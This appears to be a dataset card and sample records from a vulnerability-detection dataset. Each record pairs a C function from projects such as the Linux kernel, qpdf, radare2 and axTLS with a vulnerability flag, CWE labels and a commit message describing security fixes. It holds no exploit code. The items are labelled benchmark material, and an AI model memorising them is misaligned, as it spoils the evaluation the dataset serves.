column      type      value range
func        string    lengths 0 to 484k
target      int64     0 to 1
cwe         list      lengths 0 to 4
project     string    799 distinct values
commit_id   string    length 40 (fixed)
hash        float64   1,215,700,430,453,689,100,000,000B to 340,281,914,521,452,260,000,000,000,000B
size        int64     1 to 24k
message     string    lengths 0 to 13.3k
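The table above describes one record per function: the source code (func), a vulnerability flag (target), the associated CWE labels (cwe), the originating project and commit, and the commit message. A minimal loading sketch follows; it assumes the split is exported as JSON Lines with exactly these columns, and the file name "train.jsonl" is a placeholder rather than the dataset's actual path.

```python
# Minimal loading sketch, assuming the split is exported as JSON Lines with the
# columns described above. "train.jsonl" is a placeholder file name.
import json

rows = []
with open("train.jsonl", "r", encoding="utf-8") as fh:
    for line in fh:
        rows.append(json.loads(line))

# Each record mirrors the schema: func (str), target (int), cwe (list of str),
# project (str), commit_id (40-char str), hash (float), size (int), message (str).
first = rows[0]
print(first["project"], first["commit_id"], first["target"], first["cwe"])
print(first["message"][:120])
```

The rows below show the raw records in schema order: func, target, cwe, project, commit_id, hash, size, message.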
void __udp4_lib_err(struct sk_buff *skb, u32 info, struct hlist_head udptable[]) { struct inet_sock *inet; struct iphdr *iph = (struct iphdr*)skb->data; struct udphdr *uh = (struct udphdr*)(skb->data+(iph->ihl<<2)); const int type = icmp_hdr(skb)->type; const int code = icmp_hdr(skb)->code; struct sock *sk; int harderr; int err; sk = __udp4_lib_lookup(iph->daddr, uh->dest, iph->saddr, uh->source, skb->dev->ifindex, udptable ); if (sk == NULL) { ICMP_INC_STATS_BH(ICMP_MIB_INERRORS); return; /* No socket for error */ } err = 0; harderr = 0; inet = inet_sk(sk); switch (type) { default: case ICMP_TIME_EXCEEDED: err = EHOSTUNREACH; break; case ICMP_SOURCE_QUENCH: goto out; case ICMP_PARAMETERPROB: err = EPROTO; harderr = 1; break; case ICMP_DEST_UNREACH: if (code == ICMP_FRAG_NEEDED) { /* Path MTU discovery */ if (inet->pmtudisc != IP_PMTUDISC_DONT) { err = EMSGSIZE; harderr = 1; break; } goto out; } err = EHOSTUNREACH; if (code <= NR_ICMP_UNREACH) { harderr = icmp_err_convert[code].fatal; err = icmp_err_convert[code].errno; } break; } /* * RFC1122: OK. Passes ICMP errors back to application, as per * 4.1.3.3. */ if (!inet->recverr) { if (!harderr || sk->sk_state != TCP_ESTABLISHED) goto out; } else { ip_icmp_error(sk, skb, err, uh->dest, info, (u8*)(uh+1)); } sk->sk_err = err; sk->sk_error_report(sk); out: sock_put(sk); }
0
[]
linux-2.6
32c1da70810017a98aa6c431a5494a302b6b9a30
262,028,975,491,376,600,000,000,000,000,000,000,000
65
[UDP]: Randomize port selection. This patch causes UDP port allocation to be randomized like TCP. The earlier code would always choose same port (ie first empty list). Signed-off-by: Stephen Hemminger <[email protected]> Signed-off-by: David S. Miller <[email protected]>
log_cachedanswer (const char *q, const char type[2]) { string ("cached "); logtype (type); space (); name (q); line (); }
0
[ "CWE-362" ]
ndjbdns
847523271f3966cf4618c5689b905703c41dec1c
300,620,640,874,661,160,000,000,000,000,000,000,000
9
Merge identical outgoing requests. This patch fixes dnscache to combine *same* client queries into one single outgoing request, thus securing the server from possible cache poisoning attacks. This fixes one of the cache poisoning vulnerability reported by Mr Mark Johnson -> https://bugzilla.redhat.com/show_bug.cgi?id=838965. Nonetheless the original patch for this issue was created by Mr Jeff king -> http://www.your.org/dnscache/ Sincere thanks to Mr Mark for reporting this issue and Mr Jeff for creating the patch and releasing it under public domain.
QPDF::compute_encryption_key( std::string const& password, EncryptionData const& data) { if (data.getV() >= 5) { // For V >= 5, the encryption key is generated and stored in // the file, encrypted separately with both user and owner // passwords. return recover_encryption_key_with_password(password, data); } else { // For V < 5, the encryption key is derived from the user // password. return compute_encryption_key_from_password(password, data); } }
0
[ "CWE-125" ]
qpdf
dea704f0ab7f625e1e7b3f9a1110b45b63157317
199,059,979,189,168,700,000,000,000,000,000,000,000
17
Pad keys to avoid memory errors (fixes #147)
static int audit_filter_user_rules(struct netlink_skb_parms *cb, struct audit_krule *rule, enum audit_state *state) { int i; for (i = 0; i < rule->field_count; i++) { struct audit_field *f = &rule->fields[i]; int result = 0; switch (f->type) { case AUDIT_PID: result = audit_comparator(cb->creds.pid, f->op, f->val); break; case AUDIT_UID: result = audit_comparator(cb->creds.uid, f->op, f->val); break; case AUDIT_GID: result = audit_comparator(cb->creds.gid, f->op, f->val); break; case AUDIT_LOGINUID: result = audit_comparator(cb->loginuid, f->op, f->val); break; } if (!result) return 0; } switch (rule->action) { case AUDIT_NEVER: *state = AUDIT_DISABLED; break; case AUDIT_ALWAYS: *state = AUDIT_RECORD_CONTEXT; break; } return 1; }
0
[ "CWE-362" ]
linux-2.6
8f7b0ba1c853919b85b54774775f567f30006107
140,985,728,979,997,130,000,000,000,000,000,000,000
34
Fix inotify watch removal/umount races Inotify watch removals suck violently. To kick the watch out we need (in this order) inode->inotify_mutex and ih->mutex. That's fine if we have a hold on inode; however, for all other cases we need to make damn sure we don't race with umount. We can *NOT* just grab a reference to a watch - inotify_unmount_inodes() will happily sail past it and we'll end with reference to inode potentially outliving its superblock. Ideally we just want to grab an active reference to superblock if we can; that will make sure we won't go into inotify_umount_inodes() until we are done. Cleanup is just deactivate_super(). However, that leaves a messy case - what if we *are* racing with umount() and active references to superblock can't be acquired anymore? We can bump ->s_count, grab ->s_umount, which will almost certainly wait until the superblock is shut down and the watch in question is pining for fjords. That's fine, but there is a problem - we might have hit the window between ->s_active getting to 0 / ->s_count - below S_BIAS (i.e. the moment when superblock is past the point of no return and is heading for shutdown) and the moment when deactivate_super() acquires ->s_umount. We could just do drop_super() yield() and retry, but that's rather antisocial and this stuff is luser-triggerable. OTOH, having grabbed ->s_umount and having found that we'd got there first (i.e. that ->s_root is non-NULL) we know that we won't race with inotify_umount_inodes(). So we could grab a reference to watch and do the rest as above, just with drop_super() instead of deactivate_super(), right? Wrong. We had to drop ih->mutex before we could grab ->s_umount. So the watch could've been gone already. That still can be dealt with - we need to save watch->wd, do idr_find() and compare its result with our pointer. If they match, we either have the damn thing still alive or we'd lost not one but two races at once, the watch had been killed and a new one got created with the same ->wd at the same address. That couldn't have happened in inotify_destroy(), but inotify_rm_wd() could run into that. Still, "new one got created" is not a problem - we have every right to kill it or leave it alone, whatever's more convenient. So we can use idr_find(...) == watch && watch->inode->i_sb == sb as "grab it and kill it" check. If it's been our original watch, we are fine, if it's a newcomer - nevermind, just pretend that we'd won the race and kill the fscker anyway; we are safe since we know that its superblock won't be going away. And yes, this is far beyond mere "not very pretty"; so's the entire concept of inotify to start with. Signed-off-by: Al Viro <[email protected]> Acked-by: Greg KH <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
inline void init (hb_face_t *face) { this->blob = OT::Sanitizer<OT::cmap>::sanitize (face->reference_table (HB_OT_TAG_cmap)); const OT::cmap *cmap = OT::Sanitizer<OT::cmap>::lock_instance (this->blob); const OT::CmapSubtable *subtable = NULL; const OT::CmapSubtable *subtable_uvs = NULL; /* 32-bit subtables. */ if (!subtable) subtable = cmap->find_subtable (3, 10); if (!subtable) subtable = cmap->find_subtable (0, 6); if (!subtable) subtable = cmap->find_subtable (0, 4); /* 16-bit subtables. */ if (!subtable) subtable = cmap->find_subtable (3, 1); if (!subtable) subtable = cmap->find_subtable (0, 3); if (!subtable) subtable = cmap->find_subtable (0, 2); if (!subtable) subtable = cmap->find_subtable (0, 1); if (!subtable) subtable = cmap->find_subtable (0, 0); if (!subtable) subtable = cmap->find_subtable (3, 0); /* Meh. */ if (!subtable) subtable = &OT::Null(OT::CmapSubtable); /* UVS subtable. */ if (!subtable_uvs) subtable_uvs = cmap->find_subtable (0, 5); /* Meh. */ if (!subtable_uvs) subtable_uvs = &OT::Null(OT::CmapSubtable); this->table = subtable; this->uvs_table = subtable_uvs; }
0
[ "CWE-703" ]
harfbuzz
63ef0b41dc48d6112d1918c1b1de9de8ea90adb5
224,798,393,177,217,600,000,000,000,000,000,000,000
29
[ot-font] Fix hmtx wrong table length check Discovered by libFuzzer. Ouch! https://github.com/behdad/harfbuzz/issues/139#issuecomment-148289957
static char *r_bin_wasm_type_entry_to_string (RBinWasmTypeEntry *ptr) { if (!ptr || ptr->to_str) { return NULL; } char *ret; int p, i = 0, sz; sz = (ptr->param_count + ptr->return_count) * 5 + 9; // memory leak if (!(ret = (char*) malloc (sz * sizeof(char)))) { return NULL; } strcpy (ret + i, "("); i++; for (p = 0; p < ptr->param_count; p++ ) { R_BIN_WASM_VALUETYPETOSTRING (ret+i, ptr->param_types[p], i); // i+=3 if (p < ptr->param_count - 1) { strcpy (ret+i, ", "); i += 2; } } strcpy (ret + i, ") -> ("); i += 6; if (ptr->return_count == 1) { R_BIN_WASM_VALUETYPETOSTRING (ret + i, ptr->return_type, i); } strcpy (ret + i, ")"); return ret; }
0
[ "CWE-125", "CWE-787" ]
radare2
d2632f6483a3ceb5d8e0a5fb11142c51c43978b4
192,149,553,137,404,560,000,000,000,000,000,000,000
38
Fix crash in fuzzed wasm r2_hoobr_consume_init_expr
void x509_print(const X509_CTX *cert, CA_CERT_CTX *ca_cert_ctx) { if (cert == NULL) return; char not_part_of_cert[30]; strcpy_P(not_part_of_cert, "<Not Part Of Certificate>"); char critical[16]; strcpy_P(critical, "critical, "); printf("=== CERTIFICATE ISSUED TO ===\n"); printf("Common Name (CN):\t\t"); printf("%s\n", cert->cert_dn[X509_COMMON_NAME] ? cert->cert_dn[X509_COMMON_NAME] : not_part_of_cert); printf("Organization (O):\t\t"); printf("%s\n", cert->cert_dn[X509_ORGANIZATION] ? cert->cert_dn[X509_ORGANIZATION] : not_part_of_cert); if (cert->cert_dn[X509_ORGANIZATIONAL_UNIT]) { printf("Organizational Unit (OU):\t"); printf("%s\n", cert->cert_dn[X509_ORGANIZATIONAL_UNIT]); } if (cert->cert_dn[X509_LOCATION]) { printf("Location (L):\t\t\t"); printf("%s\n", cert->cert_dn[X509_LOCATION]); } if (cert->cert_dn[X509_COUNTRY]) { printf("Country (C):\t\t\t"); printf("%s\n", cert->cert_dn[X509_COUNTRY]); } if (cert->cert_dn[X509_STATE]) { printf("State (ST):\t\t\t"); printf("%s\n", cert->cert_dn[X509_STATE]); } if (cert->basic_constraint_present) { printf("Basic Constraints:\t\t%sCA:%s, pathlen:%d\n", cert->basic_constraint_is_critical ? critical : "", cert->basic_constraint_cA? "TRUE" : "FALSE", cert->basic_constraint_pathLenConstraint); } if (cert->key_usage_present) { printf("Key Usage:\t\t\t%s", cert->key_usage_is_critical ? critical : ""); bool has_started = false; if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_DIGITAL_SIGNATURE)) { printf("Digital Signature"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_NON_REPUDIATION)) { if (has_started) printf(", "); printf("Non Repudiation"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_KEY_ENCIPHERMENT)) { if (has_started) printf(", "); printf("Key Encipherment"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_DATA_ENCIPHERMENT)) { if (has_started) printf(", "); printf("Data Encipherment"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_KEY_AGREEMENT)) { if (has_started) printf(", "); printf("Key Agreement"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_KEY_CERT_SIGN)) { if (has_started) printf(", "); printf("Key Cert Sign"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_CRL_SIGN)) { if (has_started) printf(", "); printf("CRL Sign"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_ENCIPHER_ONLY)) { if (has_started) printf(", "); printf("Encipher Only"); has_started = true; } if (IS_SET_KEY_USAGE_FLAG(cert, KEY_USAGE_DECIPHER_ONLY)) { if (has_started) printf(", "); printf("Decipher Only"); has_started = true; } printf("\n"); } if (cert->subject_alt_name_present) { printf("Subject Alt Name:\t\t%s", cert->subject_alt_name_is_critical ? critical : ""); if (cert->subject_alt_dnsnames) { int i = 0; while (cert->subject_alt_dnsnames[i]) printf("%s ", cert->subject_alt_dnsnames[i++]); } printf("\n"); } printf("=== CERTIFICATE ISSUED BY ===\n"); printf("Common Name (CN):\t\t"); printf("%s\n", cert->ca_cert_dn[X509_COMMON_NAME] ? cert->ca_cert_dn[X509_COMMON_NAME] : not_part_of_cert); printf("Organization (O):\t\t"); printf("%s\n", cert->ca_cert_dn[X509_ORGANIZATION] ? 
cert->ca_cert_dn[X509_ORGANIZATION] : not_part_of_cert); if (cert->ca_cert_dn[X509_ORGANIZATIONAL_UNIT]) { printf("Organizational Unit (OU):\t"); printf("%s\n", cert->ca_cert_dn[X509_ORGANIZATIONAL_UNIT]); } if (cert->ca_cert_dn[X509_LOCATION]) { printf("Location (L):\t\t\t"); printf("%s\n", cert->ca_cert_dn[X509_LOCATION]); } if (cert->ca_cert_dn[X509_COUNTRY]) { printf("Country (C):\t\t\t"); printf("%s\n", cert->ca_cert_dn[X509_COUNTRY]); } if (cert->ca_cert_dn[X509_STATE]) { printf("State (ST):\t\t\t"); printf("%s\n", cert->ca_cert_dn[X509_STATE]); } printf("Not Before:\t\t\t%s", ctime(&cert->not_before)); printf("Not After:\t\t\t%s", ctime(&cert->not_after)); printf("RSA bitsize:\t\t\t%d\n", cert->rsa_ctx->num_octets*8); printf("Sig Type:\t\t\t"); switch (cert->sig_type) { case SIG_TYPE_MD5: printf("MD5\n"); break; case SIG_TYPE_SHA1: printf("SHA1\n"); break; case SIG_TYPE_SHA256: printf("SHA256\n"); break; case SIG_TYPE_SHA384: printf("SHA384\n"); break; case SIG_TYPE_SHA512: printf("SHA512\n"); break; default: printf("Unrecognized: %d\n", cert->sig_type); break; } if (ca_cert_ctx) { int pathLenConstraint = 0; char buff[64]; printf("Verify:\t\t\t\t%s\n", x509_display_error(x509_verify(ca_cert_ctx, cert, &pathLenConstraint), buff)); } #if 0 print_blob("Signature", cert->signature, cert->sig_len); bi_print("Modulus", cert->rsa_ctx->m); bi_print("Pub Exp", cert->rsa_ctx->e); #endif if (ca_cert_ctx) { x509_print(cert->next, ca_cert_ctx); } TTY_FLUSH(); }
0
[ "CWE-347" ]
axtls-8266
5efe2947ab45e81d84b5f707c51d1c64be52f36c
219,817,496,274,096,100,000,000,000,000,000,000,000
235
Apply CVE fixes for X509 parsing Apply patches developed by Sze Yiu which correct a vulnerability in X509 parsing. See CVE-2018-16150 and CVE-2018-16149 for more info.
void audit_log_session_info(struct audit_buffer *ab) { unsigned int sessionid = audit_get_sessionid(current); uid_t auid = from_kuid(&init_user_ns, audit_get_loginuid(current)); audit_log_format(ab, " auid=%u ses=%u", auid, sessionid); }
0
[ "CWE-264" ]
net
90f62cf30a78721641e08737bda787552428061e
143,390,169,582,351,600,000,000,000,000,000,000,000
7
net: Use netlink_ns_capable to verify the permisions of netlink messages It is possible by passing a netlink socket to a more privileged executable and then to fool that executable into writing to the socket data that happens to be valid netlink message to do something that privileged executable did not intend to do. To keep this from happening replace bare capable and ns_capable calls with netlink_capable, netlink_net_calls and netlink_ns_capable calls. Which act the same as the previous calls except they verify that the opener of the socket had the desired permissions as well. Reported-by: Andy Lutomirski <[email protected]> Signed-off-by: "Eric W. Biederman" <[email protected]> Signed-off-by: David S. Miller <[email protected]>
void rds_ib_exit(void) { rds_info_deregister_func(RDS_INFO_IB_CONNECTIONS, rds_ib_ic_info); rds_ib_unregister_client(); rds_ib_destroy_nodev_conns(); rds_ib_sysctl_exit(); rds_ib_recv_exit(); rds_trans_unregister(&rds_ib_transport); }
0
[ "CWE-399", "CWE-476" ]
linux
c2349758acf1874e4c2b93fe41d072336f1a31d0
144,851,325,161,921,670,000,000,000,000,000,000,000
9
rds: prevent dereference of a NULL device Binding might result in a NULL device, which is dereferenced causing this BUG: [ 1317.260548] BUG: unable to handle kernel NULL pointer dereference at 000000000000097 4 [ 1317.261847] IP: [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110 [ 1317.263315] PGD 418bcb067 PUD 3ceb21067 PMD 0 [ 1317.263502] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC [ 1317.264179] Dumping ftrace buffer: [ 1317.264774] (ftrace buffer empty) [ 1317.265220] Modules linked in: [ 1317.265824] CPU: 4 PID: 836 Comm: trinity-child46 Tainted: G W 3.13.0-rc4- next-20131218-sasha-00013-g2cebb9b-dirty #4159 [ 1317.267415] task: ffff8803ddf33000 ti: ffff8803cd31a000 task.ti: ffff8803cd31a000 [ 1317.268399] RIP: 0010:[<ffffffff84225f52>] [<ffffffff84225f52>] rds_ib_laddr_check+ 0x82/0x110 [ 1317.269670] RSP: 0000:ffff8803cd31bdf8 EFLAGS: 00010246 [ 1317.270230] RAX: 0000000000000000 RBX: ffff88020b0dd388 RCX: 0000000000000000 [ 1317.270230] RDX: ffffffff8439822e RSI: 00000000000c000a RDI: 0000000000000286 [ 1317.270230] RBP: ffff8803cd31be38 R08: 0000000000000000 R09: 0000000000000000 [ 1317.270230] R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000000 [ 1317.270230] R13: 0000000054086700 R14: 0000000000a25de0 R15: 0000000000000031 [ 1317.270230] FS: 00007ff40251d700(0000) GS:ffff88022e200000(0000) knlGS:000000000000 0000 [ 1317.270230] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 1317.270230] CR2: 0000000000000974 CR3: 00000003cd478000 CR4: 00000000000006e0 [ 1317.270230] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 1317.270230] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000090602 [ 1317.270230] Stack: [ 1317.270230] 0000000054086700 5408670000a25de0 5408670000000002 0000000000000000 [ 1317.270230] ffffffff84223542 00000000ea54c767 0000000000000000 ffffffff86d26160 [ 1317.270230] ffff8803cd31be68 ffffffff84223556 ffff8803cd31beb8 ffff8800c6765280 [ 1317.270230] Call Trace: [ 1317.270230] [<ffffffff84223542>] ? rds_trans_get_preferred+0x42/0xa0 [ 1317.270230] [<ffffffff84223556>] rds_trans_get_preferred+0x56/0xa0 [ 1317.270230] [<ffffffff8421c9c3>] rds_bind+0x73/0xf0 [ 1317.270230] [<ffffffff83e4ce62>] SYSC_bind+0x92/0xf0 [ 1317.270230] [<ffffffff812493f8>] ? context_tracking_user_exit+0xb8/0x1d0 [ 1317.270230] [<ffffffff8119313d>] ? trace_hardirqs_on+0xd/0x10 [ 1317.270230] [<ffffffff8107a852>] ? syscall_trace_enter+0x32/0x290 [ 1317.270230] [<ffffffff83e4cece>] SyS_bind+0xe/0x10 [ 1317.270230] [<ffffffff843a6ad0>] tracesys+0xdd/0xe2 [ 1317.270230] Code: 00 8b 45 cc 48 8d 75 d0 48 c7 45 d8 00 00 00 00 66 c7 45 d0 02 00 89 45 d4 48 89 df e8 78 49 76 ff 41 89 c4 85 c0 75 0c 48 8b 03 <80> b8 74 09 00 00 01 7 4 06 41 bc 9d ff ff ff f6 05 2a b6 c2 02 [ 1317.270230] RIP [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110 [ 1317.270230] RSP <ffff8803cd31bdf8> [ 1317.270230] CR2: 0000000000000974 Signed-off-by: Sasha Levin <[email protected]> Signed-off-by: David S. Miller <[email protected]>
ofputil_decode_requestforward(const struct ofp_header *outer, struct ofputil_requestforward *rf) { struct ofpbuf b = ofpbuf_const_initializer(outer, ntohs(outer->length)); /* Skip past outer message. */ enum ofpraw outer_raw = ofpraw_pull_assert(&b); ovs_assert(outer_raw == OFPRAW_OFPT14_REQUESTFORWARD); /* Validate inner message. */ if (b.size < sizeof(struct ofp_header)) { return OFPERR_OFPBFC_MSG_BAD_LEN; } const struct ofp_header *inner = b.data; unsigned int inner_len = ntohs(inner->length); if (inner_len < sizeof(struct ofp_header) || inner_len > b.size) { return OFPERR_OFPBFC_MSG_BAD_LEN; } if (inner->version != outer->version) { return OFPERR_OFPBRC_BAD_VERSION; } /* Parse inner message. */ enum ofptype type; enum ofperr error = ofptype_decode(&type, inner); if (error) { return error; } rf->xid = inner->xid; if (type == OFPTYPE_GROUP_MOD) { rf->reason = OFPRFR_GROUP_MOD; rf->group_mod = xmalloc(sizeof *rf->group_mod); error = ofputil_decode_group_mod(inner, rf->group_mod); if (error) { free(rf->group_mod); return error; } } else if (type == OFPTYPE_METER_MOD) { rf->reason = OFPRFR_METER_MOD; rf->meter_mod = xmalloc(sizeof *rf->meter_mod); ofpbuf_init(&rf->bands, 64); error = ofputil_decode_meter_mod(inner, rf->meter_mod, &rf->bands); if (error) { free(rf->meter_mod); ofpbuf_uninit(&rf->bands); return error; } } else { return OFPERR_OFPBFC_MSG_UNSUP; } return 0; }
0
[ "CWE-772" ]
ovs
77ad4225d125030420d897c873e4734ac708c66b
64,433,588,418,002,400,000,000,000,000,000,000,000
54
ofp-util: Fix memory leaks on error cases in ofputil_decode_group_mod(). Found by libFuzzer. Reported-by: Bhargava Shastry <[email protected]> Signed-off-by: Ben Pfaff <[email protected]> Acked-by: Justin Pettit <[email protected]>
static int ath6kl_usb_map_service_pipe(struct ath6kl *ar, u16 svc_id, u8 *ul_pipe, u8 *dl_pipe) { int status = 0; switch (svc_id) { case HTC_CTRL_RSVD_SVC: case WMI_CONTROL_SVC: *ul_pipe = ATH6KL_USB_PIPE_TX_CTRL; /* due to large control packets, shift to data pipe */ *dl_pipe = ATH6KL_USB_PIPE_RX_DATA; break; case WMI_DATA_BE_SVC: case WMI_DATA_BK_SVC: *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_LP; /* * Disable rxdata2 directly, it will be enabled * if FW enable rxdata2 */ *dl_pipe = ATH6KL_USB_PIPE_RX_DATA; break; case WMI_DATA_VI_SVC: if (test_bit(ATH6KL_FW_CAPABILITY_MAP_LP_ENDPOINT, ar->fw_capabilities)) *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_LP; else *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_MP; /* * Disable rxdata2 directly, it will be enabled * if FW enable rxdata2 */ *dl_pipe = ATH6KL_USB_PIPE_RX_DATA; break; case WMI_DATA_VO_SVC: if (test_bit(ATH6KL_FW_CAPABILITY_MAP_LP_ENDPOINT, ar->fw_capabilities)) *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_LP; else *ul_pipe = ATH6KL_USB_PIPE_TX_DATA_MP; /* * Disable rxdata2 directly, it will be enabled * if FW enable rxdata2 */ *dl_pipe = ATH6KL_USB_PIPE_RX_DATA; break; default: status = -EPERM; break; } return status; }
0
[ "CWE-476" ]
linux
39d170b3cb62ba98567f5c4f40c27b5864b304e5
331,975,135,744,320,980,000,000,000,000,000,000,000
54
ath6kl: fix a NULL-ptr-deref bug in ath6kl_usb_alloc_urb_from_pipe() The `ar_usb` field of `ath6kl_usb_pipe_usb_pipe` objects are initialized to point to the containing `ath6kl_usb` object according to endpoint descriptors read from the device side, as shown below in `ath6kl_usb_setup_pipe_resources`: for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) { endpoint = &iface_desc->endpoint[i].desc; // get the address from endpoint descriptor pipe_num = ath6kl_usb_get_logical_pipe_num(ar_usb, endpoint->bEndpointAddress, &urbcount); ...... // select the pipe object pipe = &ar_usb->pipes[pipe_num]; // initialize the ar_usb field pipe->ar_usb = ar_usb; } The driver assumes that the addresses reported in endpoint descriptors from device side to be complete. If a device is malicious and does not report complete addresses, it may trigger NULL-ptr-deref `ath6kl_usb_alloc_urb_from_pipe` and `ath6kl_usb_free_urb_to_pipe`. This patch fixes the bug by preventing potential NULL-ptr-deref (CVE-2019-15098). Signed-off-by: Hui Peng <[email protected]> Reported-by: Hui Peng <[email protected]> Reported-by: Mathias Payer <[email protected]> Reviewed-by: Greg Kroah-Hartman <[email protected]> Signed-off-by: Kalle Valo <[email protected]>
void __init xen_evtchn_2l_init(void) { pr_info("Using 2-level ABI\n"); evtchn_ops = &evtchn_ops_2l; }
0
[ "CWE-400", "CWE-703" ]
linux
e99502f76271d6bc4e374fe368c50c67a1fd3070
518,458,073,832,912,840,000,000,000,000,000,000
5
xen/events: defer eoi in case of excessive number of events In case rogue guests are sending events at high frequency it might happen that xen_evtchn_do_upcall() won't stop processing events in dom0. As this is done in irq handling a crash might be the result. In order to avoid that, delay further inter-domain events after some time in xen_evtchn_do_upcall() by forcing eoi processing into a worker on the same cpu, thus inhibiting new events coming in. The time after which eoi processing is to be delayed is configurable via a new module parameter "event_loop_timeout" which specifies the maximum event loop time in jiffies (default: 2, the value was chosen after some tests showing that a value of 2 was the lowest with an only slight drop of dom0 network throughput while multiple guests performed an event storm). How long eoi processing will be delayed can be specified via another parameter "event_eoi_delay" (again in jiffies, default 10, again the value was chosen after testing with different delay values). This is part of XSA-332. Cc: [email protected] Reported-by: Julien Grall <[email protected]> Signed-off-by: Juergen Gross <[email protected]> Reviewed-by: Stefano Stabellini <[email protected]> Reviewed-by: Wei Liu <[email protected]>
DLLEXPORT int tjPlaneHeight(int componentID, int height, int subsamp) { int ph, nc, retval=0; if(height<1 || subsamp<0 || subsamp>=TJ_NUMSAMP) _throw("tjPlaneHeight(): Invalid argument"); nc=(subsamp==TJSAMP_GRAY? 1:3); if(componentID<0 || componentID>=nc) _throw("tjPlaneHeight(): Invalid argument"); ph=PAD(height, tjMCUHeight[subsamp]/8); if(componentID==0) retval=ph; else retval=ph*8/tjMCUHeight[subsamp]; bailout: return retval; }
0
[]
libjpeg-turbo
dab6be4cfb2f9307b5378d2d1dc74d9080383dc2
71,724,689,303,988,180,000,000,000,000,000,000,000
19
tjDecompressToYUV*(): Fix OOB write/double free ... when attempting to decompress grayscale JPEG images with sampling factors != 1. Fixes #387
static void dirty_memory_extend(ram_addr_t old_ram_size, ram_addr_t new_ram_size) { ram_addr_t old_num_blocks = DIV_ROUND_UP(old_ram_size, DIRTY_MEMORY_BLOCK_SIZE); ram_addr_t new_num_blocks = DIV_ROUND_UP(new_ram_size, DIRTY_MEMORY_BLOCK_SIZE); int i; /* Only need to extend if block count increased */ if (new_num_blocks <= old_num_blocks) { return; } for (i = 0; i < DIRTY_MEMORY_NUM; i++) { DirtyMemoryBlocks *old_blocks; DirtyMemoryBlocks *new_blocks; int j; old_blocks = atomic_rcu_read(&ram_list.dirty_memory[i]); new_blocks = g_malloc(sizeof(*new_blocks) + sizeof(new_blocks->blocks[0]) * new_num_blocks); if (old_num_blocks) { memcpy(new_blocks->blocks, old_blocks->blocks, old_num_blocks * sizeof(old_blocks->blocks[0])); } for (j = old_num_blocks; j < new_num_blocks; j++) { new_blocks->blocks[j] = bitmap_new(DIRTY_MEMORY_BLOCK_SIZE); } atomic_rcu_set(&ram_list.dirty_memory[i], new_blocks); if (old_blocks) { g_free_rcu(old_blocks, rcu); } } }
0
[ "CWE-125" ]
qemu
04bf2526ce87f21b32c9acba1c5518708c243ad0
317,952,706,393,777,630,000,000,000,000,000,000,000
39
exec: use qemu_ram_ptr_length to access guest ram When accessing guest's ram block during DMA operation, use 'qemu_ram_ptr_length' to get ram block pointer. It ensures that DMA operation of given length is possible; And avoids any OOB memory access situations. Reported-by: Alex <[email protected]> Signed-off-by: Prasad J Pandit <[email protected]> Message-Id: <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
static int edge_tiocmget(struct tty_struct *tty) { struct usb_serial_port *port = tty->driver_data; struct edgeport_port *edge_port = usb_get_serial_port_data(port); unsigned int result = 0; unsigned int msr; unsigned int mcr; unsigned long flags; spin_lock_irqsave(&edge_port->ep_lock, flags); msr = edge_port->shadow_msr; mcr = edge_port->shadow_mcr; result = ((mcr & MCR_DTR) ? TIOCM_DTR: 0) /* 0x002 */ | ((mcr & MCR_RTS) ? TIOCM_RTS: 0) /* 0x004 */ | ((msr & EDGEPORT_MSR_CTS) ? TIOCM_CTS: 0) /* 0x020 */ | ((msr & EDGEPORT_MSR_CD) ? TIOCM_CAR: 0) /* 0x040 */ | ((msr & EDGEPORT_MSR_RI) ? TIOCM_RI: 0) /* 0x080 */ | ((msr & EDGEPORT_MSR_DSR) ? TIOCM_DSR: 0); /* 0x100 */ dev_dbg(&port->dev, "%s -- %x\n", __func__, result); spin_unlock_irqrestore(&edge_port->ep_lock, flags); return result; }
0
[ "CWE-191" ]
linux
654b404f2a222f918af9b0cd18ad469d0c941a8e
25,330,365,245,426,737,000,000,000,000,000,000,000
26
USB: serial: io_ti: fix information leak in completion handler Add missing sanity check to the bulk-in completion handler to avoid an integer underflow that can be triggered by a malicious device. This avoids leaking 128 kB of memory content from after the URB transfer buffer to user space. Fixes: 8c209e6782ca ("USB: make actual_length in struct urb field u32") Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2") Cc: stable <[email protected]> # 2.6.30 Signed-off-by: Johan Hovold <[email protected]>
static gboolean property_get_class(const GDBusPropertyTable *property, DBusMessageIter *iter, void *user_data) { struct btd_adapter *adapter = user_data; dbus_uint32_t val = adapter->dev_class; dbus_message_iter_append_basic(iter, DBUS_TYPE_UINT32, &val); return TRUE; }
0
[ "CWE-862", "CWE-863" ]
bluez
b497b5942a8beb8f89ca1c359c54ad67ec843055
275,737,694,779,169,550,000,000,000,000,000,000,000
10
adapter: Fix storing discoverable setting discoverable setting shall only be store when changed via Discoverable property and not when discovery client set it as that be considered temporary just for the lifetime of the discovery.
static const char *strip(char *str) { size_t length; char *result = str; while (*result && l_isspace(*result)) result++; length = strlen(result); if (length == 0) return result; while (l_isspace(result[length - 1])) result[--length] = '\0'; return result; }
0
[ "CWE-310" ]
jansson
8f80c2d83808150724d31793e6ade92749b1faa4
104,903,231,823,454,180,000,000,000,000,000,000,000
16
